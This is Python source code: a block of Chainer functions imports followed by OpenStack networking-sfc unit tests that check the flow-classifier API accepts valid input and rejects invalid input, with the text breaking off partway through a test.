from chainer.functions.array.concat import Concat # NOQA
from chainer.functions.array.copy import copy # NOQA
from chainer.functions.array.copy import Copy # NOQA
from chainer.functions.array.depth2space import depth2space # NOQA
from chainer.functions.array.depth2space import Depth2Space # NOQA
from chainer.functions.array.dstack import dstack # NOQA
from chainer.functions.array.expand_dims import expand_dims # NOQA
from chainer.functions.array.expand_dims import ExpandDims # NOQA
from chainer.functions.array.flatten import flatten # NOQA
from chainer.functions.array.flip import flip # NOQA
from chainer.functions.array.flip import Flip # NOQA
from chainer.functions.array.fliplr import fliplr # NOQA
from chainer.functions.array.fliplr import FlipLR # NOQA
from chainer.functions.array.flipud import flipud # NOQA
from chainer.functions.array.flipud import FlipUD # NOQA
from chainer.functions.array.get_item import get_item # NOQA
from chainer.functions.array.get_item import GetItem # NOQA
from chainer.functions.array.hstack import hstack # NOQA
from chainer.functions.array.im2col import im2col # NOQA
from chainer.functions.array.im2col import Im2Col # NOQA
from chainer.functions.array.pad import pad # NOQA
from chainer.functions.array.pad import Pad # NOQA
from chainer.functions.array.pad_sequence import pad_sequence # NOQA
from chainer.functions.array.pad_sequence import PadSequence # NOQA
from chainer.functions.array.permutate import permutate # NOQA
from chainer.functions.array.permutate import Permutate # NOQA
from chainer.functions.array.repeat import repeat # NOQA
from chainer.functions.array.reshape import reshape # NOQA
from chainer.functions.array.reshape import Reshape # NOQA
from chainer.functions.array.resize_images import resize_images # NOQA
from chainer.functions.array.resize_images import ResizeImages # NOQA
from chainer.functions.array.rollaxis import rollaxis # NOQA
from chainer.functions.array.rollaxis import Rollaxis # NOQA
from chainer.functions.array.scatter_add import scatter_add # NOQA
from chainer.functions.array.select_item import select_item # NOQA
from chainer.functions.array.select_item import SelectItem # NOQA
from chainer.functions.array.separate import separate # NOQA
from chainer.functions.array.space2depth import space2depth # NOQA
from chainer.functions.array.space2depth import Space2Depth # NOQA
from chainer.functions.array.spatial_transformer_grid import spatial_transformer_grid # NOQA
from chainer.functions.array.spatial_transformer_grid import SpatialTransformerGrid # NOQA
from chainer.functions.array.spatial_transformer_sampler import spatial_transformer_sampler # NOQA
from chainer.functions.array.spatial_transformer_sampler import SpatialTransformerSampler # NOQA
from chainer.functions.array.split_axis import split_axis # NOQA
from chainer.functions.array.split_axis import SplitAxis # NOQA
from chainer.functions.array.squeeze import squeeze # NOQA
from chainer.functions.array.squeeze import Squeeze # NOQA
from chainer.functions.array.stack import stack # NOQA
from chainer.functions.array.swapaxes import swapaxes # NOQA
from chainer.functions.array.swapaxes import Swapaxes # NOQA
from chainer.functions.array.tile import tile # NOQA
from chainer.functions.array.tile import Tile # NOQA
from chainer.functions.array.transpose import transpose # NOQA
from chainer.functions.array.transpose import Transpose # NOQA
from chainer.functions.array.transpose_sequence import transpose_sequence # NOQA
from chainer.functions.array.transpose_sequence import TransposeSequence # NOQA
from chainer.functions.array.vstack import vstack # NOQA
from chainer.functions.array.where import where # NOQA
from chainer.functions.array.where import Where # NOQA
from chainer.functions.connection.bilinear import bilinear # NOQA
from chainer.functions.connection.convolution_2d import convolution_2d # NOQA
from chainer.functions.connection.convolution_nd import convolution_nd # NOQA
from chainer.functions.connection.deconvolution_2d import deconvolution_2d # NOQA
from chainer.functions.connection.deconvolution_nd import deconvolution_nd # NOQA
from chainer.functions.connection.depthwise_convolution_2d import depthwise_convolution_2d # NOQA
from chainer.functions.connection.dilated_convolution_2d import dilated_convolution_2d # NOQA
from chainer.functions.connection.embed_id import embed_id # NOQA
from chainer.functions.connection.linear import linear # NOQA
from chainer.functions.connection.local_convolution_2d import local_convolution_2d # NOQA
from chainer.functions.connection.n_step_gru import n_step_bigru # NOQA
from chainer.functions.connection.n_step_gru import n_step_gru # NOQA
from chainer.functions.connection.n_step_gru import NStepBiGRU # NOQA
from chainer.functions.connection.n_step_gru import NStepGRU # NOQA
from chainer.functions.connection.n_step_lstm import n_step_bilstm # NOQA
from chainer.functions.connection.n_step_lstm import n_step_lstm # NOQA
from chainer.functions.connection.n_step_lstm import NStepBiLSTM # NOQA
from chainer.functions.connection.n_step_lstm import NStepLSTM # NOQA
from chainer.functions.connection.n_step_rnn import n_step_birnn # NOQA
from chainer.functions.connection.n_step_rnn import n_step_rnn # NOQA
from chainer.functions.connection.n_step_rnn import NStepBiRNNReLU # NOQA
from chainer.functions.connection.n_step_rnn import NStepBiRNNTanh # NOQA
from chainer.functions.connection.n_step_rnn import NStepRNNReLU # NOQA
from chainer.functions.connection.n_step_rnn import NStepRNNTanh # NOQA
from chainer.functions.connection.shift import shift # NOQA
from chainer.functions.evaluation.accuracy import accuracy # NOQA
from chainer.functions.evaluation.accuracy import Accuracy # NOQA
from chainer.functions.evaluation.binary_accuracy import binary_accuracy # NOQA
from chainer.functions.evaluation.binary_accuracy import BinaryAccuracy # NOQA
from chainer.functions.evaluation.classification_summary import classification_summary # NOQA
from chainer.functions.evaluation.classification_summary import ClassificationSummary # NOQA
from chainer.functions.evaluation.classification_summary import f1_score # NOQA
from chainer.functions.evaluation.classification_summary import precision # NOQA
from chainer.functions.evaluation.classification_summary import recall # NOQA
from chainer.functions.evaluation.r2_score import r2_score # NOQA
from chainer.functions.loss.absolute_error import absolute_error # NOQA
from chainer.functions.loss.absolute_error import AbsoluteError # NOQA
from chainer.functions.loss.black_out import black_out # NOQA
from chainer.functions.loss.contrastive import contrastive # NOQA
from chainer.functions.loss.contrastive import Contrastive # NOQA
from chainer.functions.loss.crf1d import argmax_crf1d # NOQA
from chainer.functions.loss.crf1d import crf1d # NOQA
from chainer.functions.loss.cross_covariance import cross_covariance # NOQA
from chainer.functions.loss.cross_covariance import CrossCovariance # NOQA
from chainer.functions.loss.ctc import connectionist_temporal_classification # NOQA
from chainer.functions.loss.ctc import ConnectionistTemporalClassification # NOQA
from chainer.functions.loss.decov import decov # NOQA
from chainer.functions.loss.decov import DeCov # NOQA
from chainer.functions.loss.hinge import hinge # NOQA
from chainer.functions.loss.hinge import Hinge # NOQA
from chainer.functions.loss.huber_loss import huber_loss # NOQA
from chainer.functions.loss.huber_loss import HuberLoss # NOQA
from chainer.functions.loss.mean_absolute_error import mean_absolute_error # NOQA
from chainer.functions.loss.mean_absolute_error import MeanAbsoluteError # NOQA
from chainer.functions.loss.mean_squared_error import mean_squared_error # NOQA
from chainer.functions.loss.mean_squared_error import MeanSquaredError # NOQA
from chainer.functions.loss.negative_sampling import negative_sampling # NOQA
from chainer.functions.loss.sigmoid_cross_entropy import sigmoid_cross_entropy # NOQA
from chainer.functions.loss.sigmoid_cross_entropy import SigmoidCrossEntropy # NOQA
from chainer.functions.loss.softmax_cross_entropy import softmax_cross_entropy # NOQA
from chainer.functions.loss.softmax_cross_entropy import SoftmaxCrossEntropy # NOQA
from chainer.functions.loss.squared_error import squared_error # NOQA
from chainer.functions.loss.squared_error import SquaredError # NOQA
from chainer.functions.loss.triplet import triplet # NOQA
from chainer.functions.loss.triplet import Triplet # NOQA
from chainer.functions.loss.vae import bernoulli_nll # NOQA
from chainer.functions.loss.vae import gaussian_kl_divergence # NOQA
from chainer.functions.loss.vae import gaussian_nll # NOQA
from chainer.functions.math.average import average # NOQA
from chainer.functions.math.basic_math import absolute # NOQA
from chainer.functions.math.basic_math import add # NOQA
from chainer.functions.math.batch_l2_norm_squared import batch_l2_norm_squared # NOQA
from chainer.functions.math.batch_l2_norm_squared import BatchL2NormSquared # NOQA
from chainer.functions.math.bias import bias # NOQA
from chainer.functions.math.ceil import ceil # NOQA
from chainer.functions.math.clip import clip # NOQA
from chainer.functions.math.clip import Clip # NOQA
from chainer.functions.math.cumsum import cumsum # NOQA
from chainer.functions.math.cumsum import Cumsum # NOQA
from chainer.functions.math.det import batch_det # NOQA
from chainer.functions.math.det import BatchDet # NOQA
from chainer.functions.math.det import det # NOQA
from chainer.functions.math.erf import erf # NOQA
from chainer.functions.math.erfc import erfc # NOQA
from chainer.functions.math.exponential import exp # NOQA
from chainer.functions.math.exponential import Exp # NOQA
from chainer.functions.math.exponential import log # NOQA
from chainer.functions.math.exponential import Log # NOQA
from chainer.functions.math.exponential import log10 # NOQA
from chainer.functions.math.exponential import Log10 # NOQA
from chainer.functions.math.exponential import log2 # NOQA
from chainer.functions.math.exponential import Log2 # NOQA
from chainer.functions.math.exponential_m1 import expm1 # NOQA
from chainer.functions.math.exponential_m1 import Expm1 # NOQA
from chainer.functions.math.fft import fft # NOQA
from chainer.functions.math.fft import ifft # NOQA
from chainer.functions.math.fix import fix # NOQA
from chainer.functions.math.floor import floor # NOQA
from chainer.functions.math.fmod import fmod # NOQA
from chainer.functions.math.fmod import Fmod # NOQA
from chainer.functions.math.hyperbolic import cosh # NOQA
from chainer.functions.math.hyperbolic import Cosh # NOQA
from chainer.functions.math.hyperbolic import sinh # NOQA
from chainer.functions.math.hyperbolic import Sinh # NOQA
from chainer.functions.math.identity import identity # NOQA
from chainer.functions.math.identity import Identity # NOQA
from chainer.functions.math.inv import batch_inv # NOQA
from chainer.functions.math.inv import BatchInv # NOQA
from chainer.functions.math.inv import inv # NOQA
from chainer.functions.math.inv import Inv # NOQA
from chainer.functions.math.linear_interpolate import linear_interpolate # NOQA
from chainer.functions.math.linear_interpolate import LinearInterpolate # NOQA
from chainer.functions.math.logarithm_1p import Log1p # NOQA
from chainer.functions.math.logarithm_1p import log1p # NOQA
from chainer.functions.math.logsumexp import logsumexp # NOQA
from chainer.functions.math.logsumexp import LogSumExp # NOQA
from chainer.functions.math.matmul import batch_matmul # NOQA
from chainer.functions.math.matmul import matmul # NOQA
from chainer.functions.math.matmul import MatMul # NOQA
from chainer.functions.math.maximum import maximum # NOQA
from chainer.functions.math.maximum import Maximum # NOQA
from chainer.functions.math.minimum import minimum # NOQA
from chainer.functions.math.minimum import Minimum # NOQA
from chainer.functions.math.minmax import argmax # NOQA
from chainer.functions.math.minmax import ArgMax # NOQA
from chainer.functions.math.minmax import argmin # NOQA
from chainer.functions.math.minmax import ArgMin # NOQA
from chainer.functions.math.minmax import max # NOQA
from chainer.functions.math.minmax import Max # NOQA
from chainer.functions.math.minmax import min # NOQA
from chainer.functions.math.minmax import Min # NOQA
from chainer.functions.math.prod import prod # NOQA
from chainer.functions.math.prod import Prod # NOQA
from chainer.functions.math.scale import scale # NOQA
from chainer.functions.math.sign import sign # NOQA
from chainer.functions.math.sqrt import rsqrt # NOQA
from chainer.functions.math.sqrt import sqrt # NOQA
from chainer.functions.math.sqrt import Sqrt # NOQA
from chainer.functions.math.square import square # NOQA
from chainer.functions.math.square import Square # NOQA
from chainer.functions.math.squared_difference import squared_difference # NOQA
from chainer.functions.math.squared_difference import SquaredDifference # NOQA
from chainer.functions.math.sum import sum # NOQA
from chainer.functions.math.sum import Sum # NOQA
from chainer.functions.math.tensordot import tensordot # NOQA
from chainer.functions.math.trigonometric import arccos # NOQA
from chainer.functions.math.trigonometric import Arccos # NOQA
from chainer.functions.math.trigonometric import arcsin # NOQA
from chainer.functions.math.trigonometric import Arcsin # NOQA
from chainer.functions.math.trigonometric import arctan # NOQA
from chainer.functions.math.trigonometric import Arctan # NOQA
from chainer.functions.math.trigonometric import arctan2 # NOQA
from chainer.functions.math.trigonometric import Arctan2 # NOQA
from chainer.functions.math.trigonometric import cos # NOQA
from chainer.functions.math.trigonometric import Cos # NOQA
from chainer.functions.math.trigonometric import sin # NOQA
from chainer.functions.math.trigonometric import Sin # NOQA
from chainer.functions.math.trigonometric import tan # NOQA
from chainer.functions.math.trigonometric import Tan # NOQA
from chainer.functions.noise.dropout import dropout # NOQA
from chainer.functions.noise.dropout import Dropout # NOQA
from chainer.functions.noise.gaussian import gaussian # NOQA
from chainer.functions.noise.gaussian import Gaussian # NOQA
from chainer.functions.noise.gumbel_softmax import gumbel_softmax # NOQA
from chainer.functions.noise.simplified_dropconnect import simplified_dropconnect # NOQA
from chainer.functions.noise.simplified_dropconnect import SimplifiedDropconnect # NOQA
from chainer.functions.noise.zoneout import zoneout # NOQA
from chainer.functions.noise.zoneout import Zoneout # NOQA
from chainer.functions.normalization.batch_normalization import batch_normalization # NOQA
from chainer.functions.normalization.batch_normalization import fixed_batch_normalization # NOQA
from chainer.functions.normalization.batch_renormalization import batch_renormalization # NOQA
from chainer.functions.normalization.batch_renormalization import fixed_batch_renormalization # NOQA
from chainer.functions.normalization.l2_normalization import normalize # NOQA
from chainer.functions.normalization.l2_normalization import NormalizeL2 # NOQA
from chainer.functions.normalization.layer_normalization import layer_normalization # NOQA
from chainer.functions.normalization.layer_normalization import LayerNormalization # NOQA
from chainer.functions.normalization.local_response_normalization import local_response_normalization # NOQA
from chainer.functions.normalization.local_response_normalization import LocalResponseNormalization # NOQA
from chainer.functions.pooling.average_pooling_2d import average_pooling_2d # NOQA
from chainer.functions.pooling.average_pooling_2d import AveragePooling2D # NOQA
from chainer.functions.pooling.average_pooling_nd import average_pooling_nd # NOQA
from chainer.functions.pooling.average_pooling_nd import AveragePoolingND # NOQA
from chainer.functions.pooling.max_pooling_2d import max_pooling_2d # NOQA
from chainer.functions.pooling.max_pooling_2d import MaxPooling2D # NOQA
from chainer.functions.pooling.max_pooling_nd import max_pooling_nd # NOQA
from chainer.functions.pooling.max_pooling_nd import MaxPoolingND # NOQA
from chainer.functions.pooling.roi_pooling_2d import roi_pooling_2d # NOQA
from chainer.functions.pooling.roi_pooling_2d import ROIPooling2D # NOQA
from chainer.functions.pooling.spatial_pyramid_pooling_2d import spatial_pyramid_pooling_2d # NOQA
from chainer.functions.pooling.unpooling_2d import Unpooling2D # NOQA
from chainer.functions.pooling.unpooling_2d import unpooling_2d # NOQA
from chainer.functions.pooling.unpooling_nd import unpooling_nd # NOQA
from chainer.functions.pooling.unpooling_nd import UnpoolingND # NOQA
from chainer.functions.pooling.upsampling_2d import Upsampling2D # NOQA
from chainer.functions.pooling.upsampling_2d import upsampling_2d # NOQA
from chainer.functions.theano.theano_function import TheanoFunction # NOQA
from chainer.functions.util.forget import forget # NOQA
from chainer.functions.util.forget import Forget # NOQA
# Aliases
mean = average
|
|
# Copyright 2015 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from neutron.api.v2 import resource as api_res_log
from neutron import manager
from neutron.notifiers import nova as nova_log
from neutron.tests.unit.api.v2 import test_base as test_api_v2
from neutron.tests.unit.extensions import base as test_api_v2_extension
from neutron_lib import constants as const
from oslo_config import cfg
from oslo_utils import uuidutils
from webob import exc
import webtest
from networking_sfc.extensions import flowclassifier as fc_ext
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
FLOW_CLASSIFIER_PATH = (fc_ext.FLOW_CLASSIFIER_PREFIX[1:] + '/' +
fc_ext.FLOW_CLASSIFIER_EXT + 's')
class FlowClassifierExtensionTestCase(
test_api_v2_extension.ExtensionTestCase
):
fmt = 'json'
def setUp(self):
self._mock_unnecessary_logging()
super(FlowClassifierExtensionTestCase, self).setUp()
self.setup_extension(
'networking_sfc.extensions.flowclassifier.'
'FlowClassifierPluginBase',
fc_ext.FLOW_CLASSIFIER_EXT,
fc_ext.Flowclassifier,
fc_ext.FLOW_CLASSIFIER_PREFIX[1:],
plural_mappings={}
)
def _mock_unnecessary_logging(self):
mock_log_cfg_p = mock.patch.object(cfg, 'LOG')
self.mock_log_cfg = mock_log_cfg_p.start()
mock_log_manager_p = mock.patch.object(manager, 'LOG')
self.mock_log_manager = mock_log_manager_p.start()
mock_log_nova_p = mock.patch.object(nova_log, 'LOG')
self.mock_log_nova = mock_log_nova_p.start()
mock_log_api_res_log_p = mock.patch.object(api_res_log, 'LOG')
self.mock_log_api_res_log = mock_log_api_res_log_p.start()
def _get_expected_flow_classifier(self, data):
source_port_range_min = data['flow_classifier'].get(
'source_port_range_min')
if source_port_range_min is not None:
source_port_range_min = int(source_port_range_min)
source_port_range_max = data['flow_classifier'].get(
'source_port_range_max')
if source_port_range_max is not None:
source_port_range_max = int(source_port_range_max)
destination_port_range_min = data['flow_classifier'].get(
'destination_port_range_min')
if destination_port_range_min is not None:
destination_port_range_min = int(destination_port_range_min)
destination_port_range_max = data['flow_classifier'].get(
'destination_port_range_max')
if destination_port_range_max is not None:
destination_port_range_max = int(destination_port_range_max)
return {'flow_classifier': {
'name': data['flow_classifier'].get('name') or '',
'description': data['flow_classifier'].get('description') or '',
'tenant_id': data['flow_classifier']['tenant_id'],
'project_id': data['flow_classifier']['project_id'],
'source_port_range_min': source_port_range_min,
'source_port_range_max': source_port_range_max,
'destination_port_range_min': destination_port_range_min,
'destination_port_range_max': destination_port_range_max,
'l7_parameters': data['flow_classifier'].get(
'l7_parameters') or {},
'destination_ip_prefix': data['flow_classifier'].get(
'destination_ip_prefix'),
'source_ip_prefix': data['flow_classifier'].get(
'source_ip_prefix'),
'logical_source_port': data['flow_classifier'].get(
'logical_source_port'),
'logical_destination_port': data['flow_classifier'].get(
'logical_destination_port'),
'ethertype': data['flow_classifier'].get(
'ethertype') or 'IPv4',
'protocol': data['flow_classifier'].get(
'protocol')
}}
def test_create_flow_classifier(self):
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_source_port_range(self):
for source_port_range_min in [None, 100, '100']:
for source_port_range_max in [None, 200, '200']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'source_port_range_min': source_port_range_min,
'source_port_range_max': source_port_range_max,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_destination_port_range(self):
for destination_port_range_min in [None, 100, '100']:
for destination_port_range_max in [None, 200, '200']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_min': destination_port_range_min,
'destination_port_range_max': destination_port_range_max,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_source_ip_prefix(self):
for logical_source_ip_prefix in [
None, '10.0.0.0/8'
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': logical_source_ip_prefix,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_destination_ip_prefix(self):
for logical_destination_ip_prefix in [
None, '10.0.0.0/8'
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'destination_ip_prefix': logical_destination_ip_prefix,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(res.status_int, exc.HTTPCreated.code)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_logical_source_port(self):
for logical_source_port in [
None, _uuid()
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': logical_source_port,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_logical_destination_port(self):
for logical_destination_port in [
None, _uuid()
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_destination_port': logical_destination_port,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_l7_parameters(self):
for l7_parameters in [None, {}]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'l7_parameters': l7_parameters
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_ethertype(self):
for ethertype in [None, 'IPv4', 'IPv6']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'ethertype': ethertype
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_protocol(self):
for protocol in [
None, const.PROTO_NAME_TCP, const.PROTO_NAME_UDP,
const.PROTO_NAME_ICMP
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'protocol': protocol
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_all_fields(self):
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'name': 'test1',
'description': 'desc',
'tenant_id': tenant_id, 'project_id': tenant_id,
'source_port_range_min': 100,
'source_port_range_max': 200,
'destination_port_range_min': 100,
'destination_port_range_max': 200,
'l7_parameters': {},
'destination_ip_prefix': '10.0.0.0/8',
'source_ip_prefix': '10.0.0.0/8',
'logical_source_port': _uuid(),
'logical_destination_port': _uuid(),
'ethertype': None,
'protocol': None
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_invalid_l7_parameters(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'l7_parameters': {'abc': 'def'},
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_invalid_protocol(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'protocol': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_invalid_ethertype(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'ethertype': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_small(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'source_port_range_min': -1,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_large(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'source_port_range_min': 65536,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_ip_prefix_no_cidr(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0',
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_ip_prefix_invalid_cidr(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0/33',
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
